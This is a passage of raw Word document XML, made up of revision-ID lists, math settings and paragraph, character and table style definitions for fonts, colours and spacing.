    <w:rsid w:val="00AB0FB0"/>
    <w:rsid w:val="00AB341F"/>
    <w:rsid w:val="00AB515D"/>
    <w:rsid w:val="00AB5D85"/>
    <w:rsid w:val="00AB66CD"/>
    <w:rsid w:val="00AC2338"/>
    <w:rsid w:val="00AC2949"/>
    <w:rsid w:val="00AC3AD4"/>
    <w:rsid w:val="00AC3F2E"/>
    <w:rsid w:val="00AC583C"/>
    <w:rsid w:val="00AD2301"/>
    <w:rsid w:val="00AD4C55"/>
    <w:rsid w:val="00AD6E34"/>
    <w:rsid w:val="00AE0BDB"/>
    <w:rsid w:val="00AE0FF7"/>
    <w:rsid w:val="00AE11EA"/>
    <w:rsid w:val="00AE153C"/>
    <w:rsid w:val="00AE369A"/>
    <w:rsid w:val="00AE660E"/>
    <w:rsid w:val="00AF2DAF"/>
    <w:rsid w:val="00AF3469"/>
    <w:rsid w:val="00B00B19"/>
    <w:rsid w:val="00B00F1A"/>
    <w:rsid w:val="00B00F75"/>
    <w:rsid w:val="00B013D2"/>
    <w:rsid w:val="00B03D9A"/>
    <w:rsid w:val="00B04749"/>
    <w:rsid w:val="00B06CFE"/>
    <w:rsid w:val="00B078A5"/>
    <w:rsid w:val="00B10785"/>
    <w:rsid w:val="00B12294"/>
    <w:rsid w:val="00B143BD"/>
    <w:rsid w:val="00B15F1B"/>
    <w:rsid w:val="00B251B3"/>
    <w:rsid w:val="00B25473"/>
    <w:rsid w:val="00B2700C"/>
    <w:rsid w:val="00B27556"/>
    <w:rsid w:val="00B27DD3"/>
    <w:rsid w:val="00B30AD7"/>
    <w:rsid w:val="00B3299B"/>
    <w:rsid w:val="00B3529B"/>
    <w:rsid w:val="00B3627A"/>
    <w:rsid w:val="00B363F3"/>
    <w:rsid w:val="00B37925"/>
    <w:rsid w:val="00B37A79"/>
    <w:rsid w:val="00B37DA5"/>
    <w:rsid w:val="00B424B7"/>
    <w:rsid w:val="00B44B5C"/>
    <w:rsid w:val="00B4694E"/>
    <w:rsid w:val="00B519CA"/>
    <w:rsid w:val="00B571C1"/>
    <w:rsid w:val="00B71A69"/>
    <w:rsid w:val="00B773FE"/>
    <w:rsid w:val="00B8099D"/>
    <w:rsid w:val="00B811E7"/>
    <w:rsid w:val="00B9127C"/>
    <w:rsid w:val="00B9139A"/>
    <w:rsid w:val="00B97566"/>
    <w:rsid w:val="00BA240C"/>
    <w:rsid w:val="00BA66E6"/>
    <w:rsid w:val="00BA7E1D"/>
    <w:rsid w:val="00BB112E"/>
    <w:rsid w:val="00BB271D"/>
    <w:rsid w:val="00BB3B16"/>
    <w:rsid w:val="00BB46B0"/>
    <w:rsid w:val="00BB4947"/>
    <w:rsid w:val="00BB5139"/>
    <w:rsid w:val="00BC032D"/>
    <w:rsid w:val="00BC23B6"/>
    <w:rsid w:val="00BC4654"/>
    <w:rsid w:val="00BC5711"/>
    <w:rsid w:val="00BC5DB5"/>
    <w:rsid w:val="00BC7221"/>
    <w:rsid w:val="00BC76FB"/>
    <w:rsid w:val="00BD100B"/>
    <w:rsid w:val="00BD29D2"/>
    <w:rsid w:val="00BD4EDE"/>
    <w:rsid w:val="00BD6988"/>
    <w:rsid w:val="00BE1C17"/>
    <w:rsid w:val="00BE3A7E"/>
    <w:rsid w:val="00BF3520"/>
    <w:rsid w:val="00BF497F"/>
    <w:rsid w:val="00BF4AE2"/>
    <w:rsid w:val="00BF6F61"/>
    <w:rsid w:val="00BF6F74"/>
    <w:rsid w:val="00BF7B5A"/>
    <w:rsid w:val="00BF7CF7"/>
    <w:rsid w:val="00C02F3D"/>
    <w:rsid w:val="00C047BB"/>
    <w:rsid w:val="00C06FC5"/>
    <w:rsid w:val="00C102C1"/>
    <w:rsid w:val="00C10606"/>
    <w:rsid w:val="00C13182"/>
    <w:rsid w:val="00C16A0E"/>
    <w:rsid w:val="00C25813"/>
    <w:rsid w:val="00C338AA"/>
    <w:rsid w:val="00C33BEC"/>
    <w:rsid w:val="00C3568A"/>
    <w:rsid w:val="00C420B0"/>
    <w:rsid w:val="00C429C8"/>
    <w:rsid w:val="00C4423B"/>
    <w:rsid w:val="00C47C88"/>
    <w:rsid w:val="00C529B4"/>
    <w:rsid w:val="00C52D3D"/>
    <w:rsid w:val="00C610B1"/>
    <w:rsid w:val="00C62AA8"/>
    <w:rsid w:val="00C62EBA"/>
    <w:rsid w:val="00C63E64"/>
    <w:rsid w:val="00C67A0F"/>
    <w:rsid w:val="00C73F7D"/>
    <w:rsid w:val="00C85826"/>
    <w:rsid w:val="00C87849"/>
    <w:rsid w:val="00C87B53"/>
    <w:rsid w:val="00C87E1F"/>
    <w:rsid w:val="00C90B0F"/>
    <w:rsid w:val="00C90B21"/>
    <w:rsid w:val="00C92765"/>
    <w:rsid w:val="00CA282F"/>
    <w:rsid w:val="00CA45E6"/>
    <w:rsid w:val="00CA48B4"/>
    <w:rsid w:val="00CA6BFF"/>
    <w:rsid w:val="00CB0BE2"/>
    <w:rsid w:val="00CB10BE"/>
    <w:rsid w:val="00CB3FB9"/>
    <w:rsid w:val="00CB4826"/>
    <w:rsid w:val="00CC0A7D"/>
    <w:rsid w:val="00CC2A3B"/>
    <w:rsid w:val="00CC5E2A"/>
    <w:rsid w:val="00CC7746"/>
    <w:rsid w:val="00CC776D"/>
    <w:rsid w:val="00CD5DDB"/>
    <w:rsid w:val="00CD672A"/>
    <w:rsid w:val="00CE0266"/>
    <w:rsid w:val="00CE1411"/>
    <w:rsid w:val="00CE1E51"/>
    <w:rsid w:val="00CE32E5"/>
    <w:rsid w:val="00CE444B"/>
    <w:rsid w:val="00CE5E84"/>
    <w:rsid w:val="00CE5FAE"/>
    <w:rsid w:val="00CE78DB"/>
    <w:rsid w:val="00CF0400"/>
    <w:rsid w:val="00D02413"/>
    <w:rsid w:val="00D02C69"/>
    <w:rsid w:val="00D0325F"/>
    <w:rsid w:val="00D03417"/>
    <w:rsid w:val="00D105E7"/>
    <w:rsid w:val="00D10649"/>
    <w:rsid w:val="00D136A7"/>
    <w:rsid w:val="00D20EDC"/>
    <w:rsid w:val="00D23C90"/>
    <w:rsid w:val="00D3045D"/>
    <w:rsid w:val="00D31A02"/>
    <w:rsid w:val="00D34539"/>
    <w:rsid w:val="00D3453D"/>
    <w:rsid w:val="00D401CC"/>
    <w:rsid w:val="00D42493"/>
    <w:rsid w:val="00D42CD4"/>
    <w:rsid w:val="00D4308B"/>
    <w:rsid w:val="00D43892"/>
    <w:rsid w:val="00D44224"/>
    <w:rsid w:val="00D52B3B"/>
    <w:rsid w:val="00D55E82"/>
    <w:rsid w:val="00D57498"/>
    <w:rsid w:val="00D610EB"/>
    <w:rsid w:val="00D616AE"/>
    <w:rsid w:val="00D62018"/>
    <w:rsid w:val="00D67B8A"/>
    <w:rsid w:val="00D7331B"/>
    <w:rsid w:val="00D762A0"/>
    <w:rsid w:val="00D775C3"/>
    <w:rsid w:val="00D77DFE"/>
    <w:rsid w:val="00D815B8"/>
    <w:rsid w:val="00D82A9D"/>
    <w:rsid w:val="00D83F91"/>
    <w:rsid w:val="00D84933"/>
    <w:rsid w:val="00D852C6"/>
    <w:rsid w:val="00D86894"/>
    <w:rsid w:val="00D868E5"/>
    <w:rsid w:val="00D871E5"/>
    <w:rsid w:val="00D901AA"/>
    <w:rsid w:val="00D92C82"/>
    <w:rsid w:val="00D97BFF"/>
    <w:rsid w:val="00DA0023"/>
    <w:rsid w:val="00DA48D8"/>
    <w:rsid w:val="00DA65B5"/>
    <w:rsid w:val="00DB00A5"/>
    <w:rsid w:val="00DB53DF"/>
    <w:rsid w:val="00DC408B"/>
    <w:rsid w:val="00DC6CCC"/>
    <w:rsid w:val="00DD429B"/>
    <w:rsid w:val="00DD488B"/>
    <w:rsid w:val="00DD54CA"/>
    <w:rsid w:val="00DD5501"/>
    <w:rsid w:val="00DD7A1A"/>
    <w:rsid w:val="00DE131A"/>
    <w:rsid w:val="00DE5DEC"/>
    <w:rsid w:val="00DE6413"/>
    <w:rsid w:val="00DF2376"/>
    <w:rsid w:val="00DF3ABA"/>
    <w:rsid w:val="00DF46CA"/>
    <w:rsid w:val="00E00861"/>
    <w:rsid w:val="00E020A7"/>
    <w:rsid w:val="00E03C92"/>
    <w:rsid w:val="00E06D70"/>
    <w:rsid w:val="00E06DF8"/>
    <w:rsid w:val="00E07016"/>
    <w:rsid w:val="00E11331"/>
    <w:rsid w:val="00E17F71"/>
    <w:rsid w:val="00E225AF"/>
    <w:rsid w:val="00E23CB4"/>
    <w:rsid w:val="00E3258C"/>
    <w:rsid w:val="00E36ACB"/>
    <w:rsid w:val="00E41FA7"/>
    <w:rsid w:val="00E57551"/>
    <w:rsid w:val="00E715EE"/>
    <w:rsid w:val="00E71F36"/>
    <w:rsid w:val="00E732B4"/>
    <w:rsid w:val="00E7500F"/>
    <w:rsid w:val="00E75531"/>
    <w:rsid w:val="00E7663C"/>
    <w:rsid w:val="00E80F4E"/>
    <w:rsid w:val="00E821A4"/>
    <w:rsid w:val="00E82F39"/>
    <w:rsid w:val="00E83FE0"/>
    <w:rsid w:val="00E847BF"/>
    <w:rsid w:val="00E8695D"/>
    <w:rsid w:val="00EA0A51"/>
    <w:rsid w:val="00EA1C3A"/>
    <w:rsid w:val="00EA3900"/>
    <w:rsid w:val="00EA3D53"/>
    <w:rsid w:val="00EB07F7"/>
    <w:rsid w:val="00EB2714"/>
    <w:rsid w:val="00EB378E"/>
    <w:rsid w:val="00EB6F85"/>
    <w:rsid w:val="00EB77DE"/>
    <w:rsid w:val="00EC144D"/>
    <w:rsid w:val="00EC17BC"/>
    <w:rsid w:val="00EC5D87"/>
    <w:rsid w:val="00EC7EE2"/>
    <w:rsid w:val="00ED1404"/>
    <w:rsid w:val="00EE4B82"/>
    <w:rsid w:val="00EE4E2B"/>
    <w:rsid w:val="00EE5802"/>
    <w:rsid w:val="00EE6961"/>
    <w:rsid w:val="00EE6F4F"/>
    <w:rsid w:val="00EF0964"/>
    <w:rsid w:val="00EF455B"/>
    <w:rsid w:val="00EF57B7"/>
    <w:rsid w:val="00F006E8"/>
    <w:rsid w:val="00F03926"/>
    <w:rsid w:val="00F057ED"/>
    <w:rsid w:val="00F1340E"/>
    <w:rsid w:val="00F152D3"/>
    <w:rsid w:val="00F152F9"/>
    <w:rsid w:val="00F16EC5"/>
    <w:rsid w:val="00F2107D"/>
    <w:rsid w:val="00F21949"/>
    <w:rsid w:val="00F21B83"/>
    <w:rsid w:val="00F23096"/>
    <w:rsid w:val="00F230A3"/>
    <w:rsid w:val="00F257D9"/>
    <w:rsid w:val="00F25B87"/>
    <w:rsid w:val="00F30288"/>
    <w:rsid w:val="00F33736"/>
    <w:rsid w:val="00F33AF8"/>
    <w:rsid w:val="00F37AA3"/>
    <w:rsid w:val="00F4503C"/>
    <w:rsid w:val="00F450D1"/>
    <w:rsid w:val="00F469EC"/>
    <w:rsid w:val="00F50A3C"/>
    <w:rsid w:val="00F5249D"/>
    <w:rsid w:val="00F527B3"/>
    <w:rsid w:val="00F54F0C"/>
    <w:rsid w:val="00F62EB4"/>
    <w:rsid w:val="00F6444F"/>
    <w:rsid w:val="00F67ED0"/>
    <w:rsid w:val="00F71420"/>
    <w:rsid w:val="00F77002"/>
    <w:rsid w:val="00F77ACB"/>
    <w:rsid w:val="00F81011"/>
    <w:rsid w:val="00F86DD3"/>
    <w:rsid w:val="00F8700B"/>
    <w:rsid w:val="00F90A76"/>
    <w:rsid w:val="00F911B9"/>
    <w:rsid w:val="00F9187B"/>
    <w:rsid w:val="00F9649A"/>
    <w:rsid w:val="00F979A7"/>
    <w:rsid w:val="00FA5020"/>
    <w:rsid w:val="00FB36E9"/>
    <w:rsid w:val="00FB3B8C"/>
    <w:rsid w:val="00FC1294"/>
    <w:rsid w:val="00FC4E52"/>
    <w:rsid w:val="00FC5260"/>
    <w:rsid w:val="00FC6DB3"/>
    <w:rsid w:val="00FD187E"/>
    <w:rsid w:val="00FD5E73"/>
    <w:rsid w:val="00FE1C8A"/>
    <w:rsid w:val="00FE4B69"/>
    <w:rsid w:val="00FE4EDB"/>
    <w:rsid w:val="00FE5290"/>
    <w:rsid w:val="00FE5770"/>
    <w:rsid w:val="00FE7E01"/>
    <w:rsid w:val="00FF4561"/>
  </w:rsids>
  <m:mathPr>
    <m:mathFont m:val="Cambria Math"/>
    <m:brkBin m:val="before"/>
    <m:brkBinSub m:val="--"/>
    <m:smallFrac m:val="0"/>
    <m:dispDef/>
    <m:lMargin m:val="0"/>
    <m:rMargin m:val="0"/>
    <m:defJc m:val="centerGroup"/>
    <m:wrapIndent m:val="1440"/>
    <m:intLim m:val="subSup"/>
    <m:naryLim m:val="undOvr"/>
  </m:mathPr>
  <w:themeFontLang w:val="en-001"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9E97"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{996A69F5-22BD-4CAA-904E-D3DB1ED8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1"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:link w:val="Heading1Char"/>
    <w:qFormat/>
    <w:rsid w:val="00BA66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BA66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A66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6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6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6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6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6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6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BA66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BA66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A66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6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6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6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6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6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6E6"/>
    <w:rPr>
      <w:rFonts w:eastAsiaTheme="majorEastAsia" w:cstheme="majorBidi"/>
      <w:color w:val="272727" w:themeColor="text1" w:themeTint="D8"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Title">
    <w:name w:val="Title"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:link w:val="TitleChar"/>
    <w:uiPriority w:val="10"/>
    <w:qFormat/>
    <w:rsid w:val="00BA66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6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6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6E6"/>
    <w:pPr>
      <w:spacing w:before="160"/>
      <w:jc w:val="center"/>
    </w:pPr>
    <w:rPr>
      <w:i/>
      <w:iCs/>
      <w:color w:val="404040" w:themeColor="text1" w:themeTint="BF"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="QuoteChar">
    <w:name w:val="Quote Char"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:link w:val="Quote"/>
    <w:uiPriority w:val="29"/>
    <w:rsid w:val="00BA66E6"/>
    <w:rPr>
      <w:i/>
      <w:iCs/>
      <w:color w:val="404040" w:themeColor="text1" w:themeTint="BF"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="ListParagraph">
    <w:name w:val="List Paragraph"/>
    <w:basedOn w:val="Normal"/>
    <w:link w:val="ListParagraphChar"/>
    <w:uiPriority w:val="34"/>
    <w:qFormat/>
    <w:rsid w:val="00BA66E6"/>
    <w:pPr>
      <w:ind w:left="720"/>
      <w:contextualSpacing/>
    </w:pPr>
  </w:style>
  <w:style w:type="character" w:styleId="IntenseEmphasis">
    <w:name w:val="Intense Emphasis"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:uiPriority w:val="21"/>
    <w:qFormat/>
    <w:rsid w:val="00BA66E6"/>
    <w:rPr>
      <w:i/>
      <w:iCs/>
      <w:color w:val="0F4761" w:themeColor="accent1" w:themeShade="BF"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="IntenseQuote">
    <w:name w:val="Intense Quote"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:link w:val="IntenseQuoteChar"/>
    <w:uiPriority w:val="30"/>
    <w:qFormat/>
    <w:rsid w:val="00BA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6E6"/>
    <w:rPr>
      <w:i/>
      <w:iCs/>
      <w:color w:val="0F4761" w:themeColor="accent1" w:themeShade="BF"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="IntenseReference">
    <w:name w:val="Intense Reference"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:uiPriority w:val="32"/>
    <w:qFormat/>
    <w:rsid w:val="00BA66E6"/>
    <w:rPr>
      <w:b/>
      <w:bCs/>
      <w:smallCaps/>
      <w:color w:val="0F4761" w:themeColor="accent1" w:themeShade="BF"/>
      <w:spacing w:val="5"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="NormalWeb">
    <w:name w:val="Normal (Web)"/>
    <w:basedOn w:val="Normal"/>
    <w:uiPriority w:val="99"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="006A25CE"/>
    <w:rPr>
      <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="Hyperlink">
    <w:name w:val="Hyperlink"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:uiPriority w:val="99"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="002D02DC"/>
    <w:rPr>
      <w:color w:val="467886" w:themeColor="hyperlink"/>
      <w:u w:val="single"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="UnresolvedMention">
    <w:name w:val="Unresolved Mention"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="002D02DC"/>
    <w:rPr>
      <w:color w:val="605E5C"/>
      <w:shd w:val="clear" w:color="auto" w:fill="E1DFDD"/>
    </w:rPr>
  </w:style>
  <w:style w:type="table" w:styleId="TableGrid">
    <w:name w:val="Table Grid"/>
    <w:basedOn w:val="TableNormal"/>
    <w:uiPriority w:val="39"/>
    <w:rsid w:val="00752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rsid w:val="006F08D7"/>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="CambriaHeading1">
    <w:name w:val="Cambria Heading1"/>
    <w:basedOn w:val="ListParagraph"/>
    <w:next w:val="Normal"/>
    <w:link w:val="CambriaHeading1Char"/>
    <w:autoRedefine/>
    <w:uiPriority w:val="99"/>
    <w:qFormat/>
    <w:rsid w:val="00F25B87"/>
    <w:pPr>
      <w:shd w:val="clear" w:color="auto" w:fill="DBE5F1"/>
      <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
      <w:ind w:left="0" w:firstLine="567"/>
      <w:contextualSpacing w:val="0"/>
      <w:jc w:val="both"/>
      <w:outlineLvl w:val="0"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:asciiTheme="majorBidi" w:eastAsia="Times New Roman" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
      <w:b/>
      <w:bCs/>
      <w:color w:val="1F497D"/>
      <w:kern w:val="0"/>
      <w:lang w:val="en-US"/>
      <w14:ligatures w14:val="none"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="CambriaHeading1Char">
    <w:name w:val="Cambria Heading1 Char"/>
    <w:basedOn w:val="ListParagraphChar"/>
    <w:link w:val="CambriaHeading1"/>
    <w:uiPriority w:val="99"/>
    <w:rsid w:val="00F25B87"/>
    <w:rPr>
      <w:rFonts w:asciiTheme="majorBidi" w:eastAsia="Times New Roman" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
      <w:b/>
      <w:bCs/>
      <w:color w:val="1F497D"/>
      <w:kern w:val="0"/>
      <w:shd w:val="clear" w:color="auto" w:fill="DBE5F1"/>
      <w:lang w:val="en-US"/>
      <w14:ligatures w14:val="none"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="BalloonText">
    <w:name w:val="Balloon Text"/>
    <w:basedOn w:val="Normal"/>
    <w:link w:val="BalloonTextChar"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="006F08D7"/>
    <w:pPr>
      <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Tahoma" w:eastAsia="Times New Roman" w:hAnsi="Tahoma" w:cs="Tahoma"/>
      <w:kern w:val="0"/>
      <w:sz w:val="16"/>
      <w:szCs w:val="16"/>
      <w:lang w:val="en-US"/>
      <w14:ligatures w14:val="none"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="BalloonTextChar">
    <w:name w:val="Balloon Text Char"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:link w:val="BalloonText"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:rsid w:val="006F08D7"/>
    <w:rPr>
      <w:rFonts w:ascii="Tahoma" w:eastAsia="Times New Roman" w:hAnsi="Tahoma" w:cs="Tahoma"/>
      <w:kern w:val="0"/>
      <w:sz w:val="16"/>
      <w:szCs w:val="16"/>
      <w:lang w:val="en-US"/>
      <w14:ligatures w14:val="none"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Header">
    <w:name w:val="header"/>
    <w:basedOn w:val="Normal"/>
    <w:link w:val="HeaderChar"/>
    <w:uiPriority w:val="99"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="006F08D7"/>
    <w:pPr>
      <w:tabs>
        <w:tab w:val="center" w:pos="4513"/>
        <w:tab w:val="right" w:pos="9026"/>
      </w:tabs>
      <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
      <w:kern w:val="0"/>
      <w:lang w:val="en-US"/>
      <w14:ligatures w14:val="none"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="HeaderChar">
    <w:name w:val="Header Char"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:link w:val="Header"/>
    <w:uiPriority w:val="99"/>
    <w:rsid w:val="006F08D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6F08D7"/>
    <w:pPr>
      <w:tabs>
        <w:tab w:val="center" w:pos="4513"/>
        <w:tab w:val="right" w:pos="9026"/>
      </w:tabs>
      <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
      <w:kern w:val="0"/>
      <w:lang w:val="en-US"/>
      <w14:ligatures w14:val="none"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="FooterChar">
    <w:name w:val="Footer Char"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:link w:val="Footer"/>
    <w:uiPriority w:val="99"/>
    <w:rsid w:val="006F08D7"/>
    <w:rPr>
      <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
      <w:kern w:val="0"/>
      <w:lang w:val="en-US"/>
      <w14:ligatures w14:val="none"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="TableSmHeadingRight">
    <w:name w:val="Table_Sm_Heading_Right"/>
    <w:basedOn w:val="Normal"/>
    <w:uiPriority w:val="99"/>
    <w:rsid w:val="006F08D7"/>
    <w:pPr>
      <w:keepNext/>
      <w:keepLines/>
      <w:spacing w:before="60" w:after="40" w:line="240" w:lineRule="auto"/>
      <w:jc w:val="right"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Futura Bk" w:eastAsia="PMingLiU" w:hAnsi="Futura Bk" w:cs="Times New Roman"/>
      <w:b/>
      <w:kern w:val="0"/>
      <w:sz w:val="16"/>
      <w:szCs w:val="20"/>
      <w:lang w:val="en-GB"/>
      <w14:ligatures w14:val="none"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="CambriaH1">
    <w:name w:val="Cambria H1"/>
    <w:basedOn w:val="ListParagraph"/>
    <w:rsid w:val="006F08D7"/>
    <w:pPr>
      <w:numPr>
        <w:numId w:val="1"/>
      </w:numPr>
      <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      <w:ind w:left="0" w:firstLine="0"/>
      <w:contextualSpacing w:val="0"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Cambria" w:eastAsia="Times New Roman" w:hAnsi="Cambria" w:cs="Times New Roman"/>
      <w:b/>
      <w:color w:val="1F497D"/>
      <w:kern w:val="0"/>
      <w:sz w:val="32"/>
      <w:szCs w:val="32"/>
      <w:lang w:val="en-US"/>
      <w14:ligatures w14:val="none"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="CambriaH2">
    <w:name w:val="Cambria H2"/>
    <w:basedOn w:val="CambriaH1"/>
    <w:rsid w:val="006F08D7"/>
    <w:pPr>
      <w:numPr>
        <w:ilvl w:val="1"/>
      </w:numPr>
      <w:ind w:left="0" w:firstLine="0"/>
    </w:pPr>
    <w:rPr>
      <w:sz w:val="28"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="CalibriaHeading3">
    <w:name w:val="Calibria Heading 3"/>
    <w:basedOn w:val="ListParagraph"/>
    <w:link w:val="CalibriaHeading3Char"/>
    <w:uiPriority w:val="99"/>
    <w:qFormat/>
    <w:rsid w:val="006F08D7"/>
    <w:pPr>
      <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      <w:ind w:left="0"/>
      <w:contextualSpacing w:val="0"/>
      <w:jc w:val="both"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Calibri" w:eastAsia="Times New Roman" w:hAnsi="Calibri" w:cs="Times New Roman"/>
      <w:color w:val="1F497D"/>
      <w:kern w:val="0"/>
      <w:lang w:val="en-US"/>
      <w14:ligatures w14:val="none"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="CalibriaHeading3Char">
    <w:name w:val="Calibria Heading 3 Char"/>
    <w:basedOn w:val="ListParagraphChar"/>
    <w:link w:val="CalibriaHeading3"/>
    <w:uiPriority w:val="99"/>
    <w:rsid w:val="006F08D7"/>
    <w:rPr>
      <w:rFonts w:ascii="Calibri" w:eastAsia="Times New Roman" w:hAnsi="Calibri" w:cs="Times New Roman"/>
      <w:color w:val="1F497D"/>
      <w:kern w:val="0"/>
      <w:lang w:val="en-US"/>
      <w14:ligatures w14:val="none"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="CalibriaHeading2">
    <w:name w:val="Calibria Heading 2"/>
    <w:basedOn w:val="ListParagraph"/>
    <w:link w:val="CalibriaHeading2Char"/>
    <w:uiPriority w:val="99"/>
    <w:qFormat/>
    <w:rsid w:val="006F08D7"/>
    <w:pPr>
      <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      <w:ind w:left="302" w:hanging="302"/>
      <w:contextualSpacing w:val="0"/>
      <w:jc w:val="both"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Calibri" w:eastAsia="Times New Roman" w:hAnsi="Calibri" w:cs="Times New Roman"/>
      <w:b/>
      <w:color w:val="1F497D"/>
      <w:kern w:val="0"/>
      <w:sz w:val="28"/>
      <w:szCs w:val="28"/>
      <w:lang w:val="en-US"/>
      <w14:ligatures w14:val="none"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="CalibriaHeading2Char">
    <w:name w:val="Calibria Heading 2 Char"/>
    <w:basedOn w:val="ListParagraphChar"/>
    <w:link w:val="CalibriaHeading2"/>
    <w:uiPriority w:val="99"/>
    <w:rsid w:val="006F08D7"/>
    <w:rPr>
      <w:rFonts w:ascii="Calibri" w:eastAsia="Times New Roman" w:hAnsi="Calibri" w:cs="Times New Roman"/>
      <w:b/>
      <w:color w:val="1F497D"/>
      <w:kern w:val="0"/>
      <w:sz w:val="28"/>
      <w:szCs w:val="28"/>
      <w:lang w:val="en-US"/>
      <w14:ligatures w14:val="none"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="Default">
    <w:name w:val="Default"/>
    <w:rsid w:val="006F08D7"/>
    <w:pPr>
      <w:autoSpaceDE w:val="0"/>
      <w:autoSpaceDN w:val="0"/>
      <w:adjustRightInd w:val="0"/>
      <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Calibri" w:eastAsia="Times New Roman" w:hAnsi="Calibri" w:cs="Calibri"/>
      <w:color w:val="000000"/>
      <w:kern w:val="0"/>
      <w:lang w:val="en-US"/>
      <w14:ligatures w14:val="none"/>
    </w:rPr>
  </w:style>
  <w:style w:type="table" w:customStyle="1" w:styleId="LightShading-Accent11">
    <w:name w:val="Light Shading - Accent 11"/>
    <w:basedOn w:val="TableNormal"/>
    <w:uiPriority w:val="60"/>
    <w:rsid w:val="006F08D7"/>
    <w:pPr>
      <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
    </w:pPr>
    <w:rPr>
      <w:color w:val="0F4761" w:themeColor="accent1" w:themeShade="BF"/>
      <w:kern w:val="0"/>
      <w:sz w:val="22"/>
      <w:szCs w:val="22"/>
      <w:lang w:val="en-IN"/>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5">
    <w:name w:val="Light Shading Accent 5"/>
    <w:basedOn w:val="TableNormal"/>
    <w:uiPriority w:val="60"/>
    <w:rsid w:val="006F08D7"/>
    <w:pPr>
      <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
    </w:pPr>
    <w:rPr>
      <w:color w:val="77206D" w:themeColor="accent5" w:themeShade="BF"/>
      <w:kern w:val="0"/>
      <w:sz w:val="22"/>
      <w:szCs w:val="22"/>
      <w:lang w:val="en-IN"/>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character" w:customStyle="1" w:styleId="UnresolvedMention1">
    <w:name w:val="Unresolved Mention1"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="006F08D7"/>
    <w:rPr>
      <w:color w:val="605E5C"/>
